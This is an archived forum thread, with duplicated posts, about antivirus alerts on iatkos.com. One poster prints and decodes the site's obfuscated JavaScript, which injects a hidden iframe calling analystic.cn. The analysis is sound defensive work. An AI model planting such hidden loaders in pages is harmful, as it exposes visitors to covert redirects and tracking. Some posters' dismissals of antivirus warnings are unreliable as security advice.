This is what kaspersky told me when I tried checking out the link on uphuck.com
"Kaspersky Internet Security 7.0
The requested URL http://www.iatkos.com/ is infected with Trojan-Clicker.HTML.IFrame.bk virus"
Obviously I can't be sure, just using the forum to let people in the osx86 community aware of the potential danger.
Full Version: Beware iatkos.com
Yep. my Clam-AV powered internet filter says:
The content filter has blocked the page that you have requested.
Web Site Address http://www.iatkos.com/
Description Virus or bad content detected. JS.Agent-6
The content filter has blocked the page that you have requested.
Web Site Address http://www.iatkos.com/
Description Virus or bad content detected. JS.Agent-6
Uh oh. I visited that site but I didn't click on anything (I think). I'm going to contact Uphuck about this.
UPDATE: Just sent out an email and a PM to uphuck about this. I'm not going to visit the site till this is cleared up
UPDATE: Just sent out an email and a PM to uphuck about this. I'm not going to visit the site till this is cleared up
Hopefully this wasn't intentional 
I don't think Uphuck would do something like that but its a perfect target seeing as so many people are anticipating the release of iATKOS.
Trojan-Clicker.HTML.IFrame.bk virus
IS what i get also with zonealarm security suite
IS what i get also with zonealarm security suite
I can't find any info on this virus. Is it serious? I visited the site 2-3 times before but my protection (various firewalls, antivirus, antispyware) didn't detect anything. Maybe this is a recent threat.
It's a trojan clicker....
<a href="http://www.viruslist.com/en/virusesdescribed?chapter=153317864" class="none_green">Trojan Clickers
This family of Trojans redirects victim machines to specified websites or other Internet resources. Clickers either send the necessary commands to the browser or replace system files where standard Internet urls are stored (e.g. the 'hosts' file in MS Windows).
Clickers are used:
<a href="http://www.viruslist.com/en/virusesdescribed?chapter=153317864" class="none_green">Trojan Clickers
This family of Trojans redirects victim machines to specified websites or other Internet resources. Clickers either send the necessary commands to the browser or replace system files where standard Internet urls are stored (e.g. the 'hosts' file in MS Windows).
Clickers are used:
- To raise the hit-count of a specific site for advertising purposes
- To organize a DoS attack on a specified server or site
- To lead the victim to an infected resource where the machine will be attacked by other malware (viruses or Trojans)
Just read the source of the html and I think they got something to hide...
Quick analyze:
<script type="text/javascript">document.write('
\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070
\u003a\u002f\u002f\u0061\u006e\u0061\u006c\u0079\u0073\u0074\u0069\u0063\u002e\u0063\u006e\u002f\u0069
\u006e\u002e\u0063\u0067\u0069\u003f\u0064\u0065\u0066\u0061\u0075\u006c\u0074\u0022\u0020\u0073\u0074
\u0079\u006c\u0065\u003d\u0022\u0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u003a\u0020
\u0068\u0069\u0064\u0064\u0065\u006e\u003b\u0020\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u0020
\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>
decoded to ascii gives you:
<iframe src="http://analystic.cn/in.cgi?default" style="visibility: hidden; display: none"></iframe>
Whatever that is...I can't tell. It redirects to google. Quite suspicious if you ask me...
regards,
chris
Quick analyze:
<script type="text/javascript">document.write('
\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070
\u003a\u002f\u002f\u0061\u006e\u0061\u006c\u0079\u0073\u0074\u0069\u0063\u002e\u0063\u006e\u002f\u0069
\u006e\u002e\u0063\u0067\u0069\u003f\u0064\u0065\u0066\u0061\u0075\u006c\u0074\u0022\u0020\u0073\u0074
\u0079\u006c\u0065\u003d\u0022\u0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u003a\u0020
\u0068\u0069\u0064\u0064\u0065\u006e\u003b\u0020\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u0020
\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>
decoded to ascii gives you:
<iframe src="http://analystic.cn/in.cgi?default" style="visibility: hidden; display: none"></iframe>
Whatever that is...I can't tell. It redirects to google. Quite suspicious if you ask me...
regards,
chris
Suspicious indeed. No more iatkos.com for me.
QUOTE (InorganicMatter @ Dec 3 2007, 04:20 PM) 
Yep. my Clam-AV powered internet filter says:
Where is this filter? Or is it a part of ClamXAV that I don't know about?
QUOTE (A Nonny Moose @ Dec 4 2007, 06:08 PM)
Where is this filter? Or is it a part of ClamXAV that I don't know about?
The latest version of ClarkConnect has got ClamAV virus scanning built into the web cache and content filter. It's a great piece of software, and the only real requirement is two network cards. I love it!
This can happen when the webhost gets hacked/virused, the virus implants code on every page hosted by the server. The host needs to be alerted, theres really nothing the webmaster can do if its a server wide virus.
Important Update:
After publishing this story in my blog, a user commented:
I don't know why iWeb would do this but I trust this person and I think its pretty safe to say that iatkos.com is safe.
After publishing this story in my blog, a user commented:
QUOTE
eskurza has said it was made with iWeb. This is one of the tags the iWeb will put into a site it builds. There is nothing malicious about it.
I don't know why iWeb would do this but I trust this person and I think its pretty safe to say that iatkos.com is safe.
Well, many AVs are hoaxing today because websites are getting more and more complex, especially if they put so much shi* in it like iWeb.
(Nothing wrong with iWeb, this is just the downside of making it that easy). So as long as you don't download or install an executeable or
plugin, it doesn't matter what AVs tells you.
(Nothing wrong with iWeb, this is just the downside of making it that easy). So as long as you don't download or install an executeable or
plugin, it doesn't matter what AVs tells you.
IDK, I went there once. My AV didn't see anything.....
Mine neither...I visited it on Windows XP SP2 w/ all patches and Firefox 2 latest release + AVG + Ad-aware 2007 + ZoneAlarm + Spybot & D + Windows Defender.
I have this whole ton of security stuff installed and none of them detected anything.
I have this whole ton of security stuff installed and none of them detected anything.
QUOTE (~pcwiz @ Dec 10 2007, 09:25 PM)
Mine neither...I visited it on Windows XP SP2 w/ all patches and Firefox 2 latest release + AVG + Ad-aware 2007 + ZoneAlarm + Spybot & D + Windows Defender.
Bloat rly?
lol you guys are funny..
Use firefox.........
Use firefox.........
If you use IE7 you are cursed.........LMFAOROTFL
It wasn't bad; but it got bloated after 6.0!
It wasn't bad; but it got bloated after 6.0!
Very Funny. May be this guy bring the virus around the world. HA. HA. I wait two to three time a day. I have antivirus to protect my computer. I never get alert from uphuck.com
Never said it was a virus. Nor do I believe it's Iwebs fault, until someone can reproduce it.
The html/author is just trying to hide something. Might be a counter, might be something else.
http://isc.sans.org/diary.html?date=2004-07-23
The *method* is quite old actually.
The html/author is just trying to hide something. Might be a counter, might be something else.
http://isc.sans.org/diary.html?date=2004-07-23
The *method* is quite old actually.
I just went on iatkos.com now and nothing happened. No viruses.
Whatever it is, I don't think its a reason to be concerned.
Whatever it is, I don't think its a reason to be concerned.
I use special protection for viruses called Ubuntu.
Actually, that "special protection" is the Linux kernel itself
QUOTE (fatshitcat @ Dec 15 2007, 09:40 PM)
Actually, that "special protection" is the Linux kernel itself
How can you expect an Ubuntu user knows what a kernel is?
...just kidding, don't want to start a distro war.
QUOTE (chris2k @ Dec 15 2007, 03:54 PM)
How can you expect an Ubuntu user knows what a kernel is?
Gold.
Guys another thing:
I checked out some other sites made using iWeb but they don't have that strange code in it. Maybe its the theme or something...
I checked out some other sites made using iWeb but they don't have that strange code in it. Maybe its the theme or something...
There is...
Trust me, scripts are nuts...
Trust me, scripts are nuts...
This looks like something that has spread to a few other websites out there. I've been chasing a few domains I've found linked to this domain (analystic.in / .cn). Lots of redirecting to blank pages (though I assume something is happening server-side when these 'blank' pages are loaded).
It looks completely harmless. It's not a "virus", so I wouldn't go throwing that word around just because an AV catches it. It does look to be malicious in terms of how it got there, but I think it's just a script used for farming data (not even personally identifiable data, just demographics like your browser, etc). I may be wrong, but this is the only thing I can see that might even be possible with what it's doing.
I'll look into it a bit more because it is pretty interesting.
It looks completely harmless. It's not a "virus", so I wouldn't go throwing that word around just because an AV catches it. It does look to be malicious in terms of how it got there, but I think it's just a script used for farming data (not even personally identifiable data, just demographics like your browser, etc). I may be wrong, but this is the only thing I can see that might even be possible with what it's doing.
I'll look into it a bit more because it is pretty interesting.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.